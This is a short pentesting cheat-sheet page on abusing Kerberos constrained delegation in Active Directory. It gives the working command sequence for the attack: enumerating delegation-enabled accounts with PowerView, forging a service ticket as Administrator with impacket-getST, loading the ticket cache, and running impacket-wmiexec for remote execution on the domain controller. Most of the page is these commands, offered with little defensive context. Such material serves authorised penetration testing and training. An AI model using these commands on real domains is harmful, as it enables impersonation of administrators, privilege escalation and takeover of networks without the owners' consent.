Constrained Delegation Attack
Last modified: 2024-02-18
If a compromised account has the Kerberos Constrained Delegation right, the account may impersonate another user to request Kerberos service ticket and use it for such as signin services.
Investigation
Check if Kerberos Constrained Delegation Enabled for User
Get-NetUser -TrustedToAuth
Exploit
1. Request Service Ticket for Another User
The target SPN needs to be allowed for delegation.
# -k: Use Kerberos Auth
impacket-getST -k -impersonate Administrator -spn cifs/dc.example.local example.local/UserName
2. Use the Service Ticket
After getting the service ticket, we can use it for further pentesting.
We need to add the environment variable as below:
export KRB5CCNAME=`pwd`/Administrator.ccache
# Check by listing tickets.
# If the klist command not found, install it by `apt install krb5-user`
klist
-
Login to Services with Kerberos Auth
# -k: Use Kerberos Auth # -no-pass: No password impacket-wmiexec example.local/Administrator@example.local -k -no-pass